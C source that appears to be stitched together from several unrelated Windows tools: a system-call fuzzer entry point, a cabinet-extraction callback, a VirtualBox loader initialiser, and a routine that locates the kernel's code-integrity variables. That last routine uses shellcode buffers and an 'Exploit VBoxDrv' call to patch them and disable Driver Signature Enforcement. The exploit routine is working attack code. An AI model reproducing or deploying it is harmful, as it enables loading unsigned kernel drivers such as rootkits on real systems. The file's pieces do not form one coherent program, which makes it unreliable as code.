/*
* main
*
* Purpose:
*
* Program main, process command line options.
*
*/
void main()
{
PVOID ExceptionHandler;
CHAR szCmdLine[MAX_PATH + 1];
ExceptionHandler = RtlAddVectoredExceptionHandler(1, &VehHandler);
if (ExceptionHandler) {
RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine));
GetCommandLineParamA((LPCSTR)GetCommandLineA(), 1, (LPSTR)&szCmdLine, MAX_PATH, NULL);
if (_strcmpi_a(szCmdLine, PARAM_WIN32K) == 0) {
RtlSecureZeroMemory(szCmdLine, sizeof(szCmdLine));
GetCommandLineParamA((LPCSTR)GetCommandLineA(), 2, (LPSTR)&szCmdLine, MAX_PATH, NULL);
#ifdef _DEBUG
if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0)
g_Log = TRUE;
#endif
fuzz_win32k();
}
else {
#ifdef _DEBUG
if (_strcmpi_a(szCmdLine, PARAM_LOG) == 0)
g_Log = TRUE;
#endif
fuzz_ntos();
}
RtlRemoveVectoredExceptionHandler(ExceptionHandler);
}
ExitProcess(0);
}
INT_PTR DIAMONDAPI fdiNotify(FDINOTIFICATIONTYPE fdint, PFDINOTIFICATION pfdin)
{
INT_PTR Result = 0;
CABDATA *Data, *ReturnData = NULL;
LPSTR LookupFileName;
LONG Size;
switch (fdint) {
case fdintCOPY_FILE:
if (pfdin->pv == NULL)
break;
Data = (CABDATA *)pfdin->pv;
LookupFileName = (LPSTR)&Data->Size;
Size = pfdin->cb;
if (_strcmpi_a(LookupFileName, pfdin->psz1) == 0) {
ReturnData = LocalAlloc(LPTR, sizeof(CABDATA));
if (ReturnData) {
ReturnData->Buffer = LocalAlloc(LPTR, pfdin->cb);
if (ReturnData->Buffer == NULL) {
LocalFree(ReturnData);
ReturnData = NULL;
}
else {
ReturnData->Offset = 0;
ReturnData->Size = pfdin->cb;
Data->Buffer = ReturnData->Buffer;
Data->Size = ReturnData->Size;
}
return (INT_PTR)ReturnData;
}
}
break;
case fdintCLOSE_FILE_INFO: //release ReturnedInfo
LocalFree((HLOCAL)pfdin->hf);
Result = 1;
break;
default:
break;
}
return Result;
}
/*
* ldrInit
*
* Purpose:
*
* Initialize loader global variables.
*
*/
BOOL ldrInit(
DWORD ldrCommand
)
{
BOOL bResult = FALSE, bFound = FALSE, cond = FALSE;
DWORD dwSize;
ULONG rl = 0, c;
HKEY hKey = NULL;
LRESULT lRet;
LONG rel = 0;
PVOID MappedKernel = NULL;
ULONG_PTR KernelBase = 0L;
SIZE_T ModuleSize;
PLIST_ENTRY Head, Next;
PLDR_DATA_TABLE_ENTRY Entry;
PRTL_PROCESS_MODULES miSpace = NULL;
CHAR KernelFullPathName[MAX_PATH * 2];
TCHAR szBuffer[MAX_PATH + 1];
do {
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"),
0, KEY_READ, &hKey);
//
// If key not exists, return FALSE and loader will exit.
//
if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
break;
}
//
// If we are not in install mode - leave here.
//
if (ldrCommand != TSMI_INSTALL) {
bResult = TRUE;
break;
}
//
// Select default patch table.
//
g_TsmiPatchDataValue = TsmiPatchDataValue;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue);
//
// Read VBox version and select proper table.
//
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
dwSize = MAX_PATH * sizeof(TCHAR);
lRet = RegQueryValueEx(hKey, TEXT("Version"), NULL, NULL, (LPBYTE)&szBuffer, &dwSize);
if (lRet != ERROR_SUCCESS) {
break;
}
if (_strcmpi(szBuffer, TEXT("4.3.16")) == 0) {
g_TsmiPatchDataValue = &TsmiPatchDataValue_4316;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4316);
}
if (_strcmpi(szBuffer, TEXT("4.3.18")) == 0) {
g_TsmiPatchDataValue = &TsmiPatchDataValue_4318;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4318);
}
if (_strcmpi(szBuffer, TEXT("4.3.20")) == 0) {
g_TsmiPatchDataValue = &TsmiPatchDataValue_4320;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4320);
}
if (
(_strcmpi(szBuffer, TEXT("4.3.22")) == 0) ||
(_strcmpi(szBuffer, TEXT("4.3.24")) == 0)
)
{
g_TsmiPatchDataValue = &TsmiPatchDataValue_4322_24;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4322_24);
}
if (_strcmpi(szBuffer, TEXT("4.3.26")) == 0) {
g_TsmiPatchDataValue = &TsmiPatchDataValue_4326;
g_TsmiPatchDataValueSize = sizeof(TsmiPatchDataValue_4326);
}
//
// Enumerate loaded drivers.
//
miSpace = supGetSystemInfo(SystemModuleInformation);
if (miSpace == NULL) {
break;
}
if (miSpace->NumberOfModules == 0) {
break;
}
//
// Query system32 folder.
//
RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
if (rl == 0) {
break;
}
KernelFullPathName[rl] = (CHAR)'\\';
//
// For vista/7 find ntoskrnl.exe
//
bFound = FALSE;
if (g_osv.dwMajorVersion == 6) {
if (g_osv.dwMinorVersion < 2) {
_strcpy_a(&KernelFullPathName[rl + 1],
(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
bFound = TRUE;
}
}
//
// For 8+, 10 find CI.DLL
//
if (bFound == FALSE) {
_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
for (c = 0; c < miSpace->NumberOfModules; c++)
if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
CI_DLL) == 0)
{
KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
break;
}
}
HeapFree(GetProcessHeap(), 0, miSpace);
miSpace = NULL;
//
// Map ntoskrnl/CI.DLL in our address space.
//
MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
if (MappedKernel == NULL) {
break;
}
if (g_osv.dwMajorVersion == 6) {
// Find g_CiEnabled Vista, Seven
if (g_osv.dwMinorVersion < 2) {
// Query module size via PEB loader for bruteforce.
ModuleSize = 0;
EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
Next = Head->Flink;
while (Next != Head) {
Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (Entry->DllBase == MappedKernel) {
ModuleSize = Entry->SizeOfImage;
break;
}
Next = Next->Flink;
}
LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
// Module not found, abort.
if (ModuleSize == 0) {
break;
}
rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
}
else {
// Find g_CiOptions w8+
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
}
else {
// Otherwise > NT6.x, find g_CiOptions 10+
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
if (rel == 0)
break;
g_CiVariable = KernelBase;
bResult = TRUE;
} while (cond);
if (hKey) {
RegCloseKey(hKey);
}
if (miSpace != NULL) {
HeapFree(GetProcessHeap(), 0, miSpace);
}
if (MappedKernel != NULL) {
FreeLibrary(MappedKernel);
}
return bResult;
}
BOOL DoWork(
HANDLE hDevice,
BOOL bDisable
)
{
BOOL bRes = FALSE, bFound, cond;
ULONG rl = 0, c;
LONG rel = 0;
PVOID scBuffer = NULL, MappedKernel = NULL;
ULONG_PTR KernelBase = 0L;
SIZE_T ModuleSize;
PLIST_ENTRY Head, Next;
PLDR_DATA_TABLE_ENTRY Entry;
PRTL_PROCESS_MODULES miSpace;
CHAR KernelFullPathName[BUFFER_SIZE];
CHAR szOdsText[BUFFER_SIZE];
cond = FALSE;
do {
//
// Enumerate loaded drivers.
//
miSpace = supGetSystemInfo(SystemModuleInformation);
if (miSpace == NULL) {
break;
}
if (miSpace->NumberOfModules == 0) {
break;
}
RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
if (rl == 0) {
break;
}
KernelFullPathName[rl] = (CHAR)'\\';
_strcpy_a(szOdsText, "[DF] Windows v");
ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
_strcat_a(szOdsText, ".");
ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// For vista/7 find ntoskrnl.exe
//
bFound = FALSE;
if (osv.dwMajorVersion == 6) {
if (osv.dwMinorVersion < 2) {
_strcpy_a(&KernelFullPathName[rl + 1],
(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
bFound = TRUE;
}
}
//
// For 8+, 10 find CI.DLL
//
if (bFound == FALSE) {
_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
for (c = 0; c < miSpace->NumberOfModules; c++)
if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
CI_DLL) == 0)
{
KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
break;
}
}
HeapFree(GetProcessHeap(), 0, miSpace);
miSpace = NULL;
_strcpy_a(szOdsText, "[DF] Target module ");
_strcat_a(szOdsText, KernelFullPathName);
OutputDebugStringA(szOdsText);
_strcpy_a(szOdsText, "[DF] Module base ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Map ntoskrnl/CI.DLL in our address space.
//
MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
if (MappedKernel == NULL) {
break;
}
//
// Check if we are in NT6.x branch
//
if (osv.dwMajorVersion == 6) {
//
// Find g_CiEnabled Vista, Seven
//
if (osv.dwMinorVersion < 2) {
//
// Query module size via PEB loader for bruteforce.
//
ModuleSize = 0;
EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
Next = Head->Flink;
while (Next != Head) {
Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (Entry->DllBase == MappedKernel) {
ModuleSize = Entry->SizeOfImage;
break;
}
Next = Next->Flink;
}
LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
//
// Module not found, abort.
//
if (ModuleSize == 0) {
break;
}
rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
}
else {
//
// Find g_CiOptions w8+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
}
else {
//
// Otherwise > NT6.x, find g_CiOptions 10+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
if (rel == 0)
break;
_strcpy_a(szOdsText, "[DF] Apply patch to address ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Select proper shellcode buffer
//
if (bDisable) {
scBuffer = (PVOID)scDisable;
}
else {
//
//Shellcode for for 8/10+
//
scBuffer = (PVOID)scEnable8Plus;
if (osv.dwMajorVersion == 6) {
//
//Shellcode for vista, 7
//
if (osv.dwMinorVersion < 2) {
scBuffer = (PVOID)scEnableVista7;
}
}
}
//
// Exploit VBoxDrv.
//
bRes = ControlDSE(hDevice, KernelBase, scBuffer);
} while (cond);
if (MappedKernel != NULL) {
FreeLibrary(MappedKernel);
}
if (miSpace != NULL) {
HeapFree(GetProcessHeap(), 0, miSpace);
}
return bRes;
}
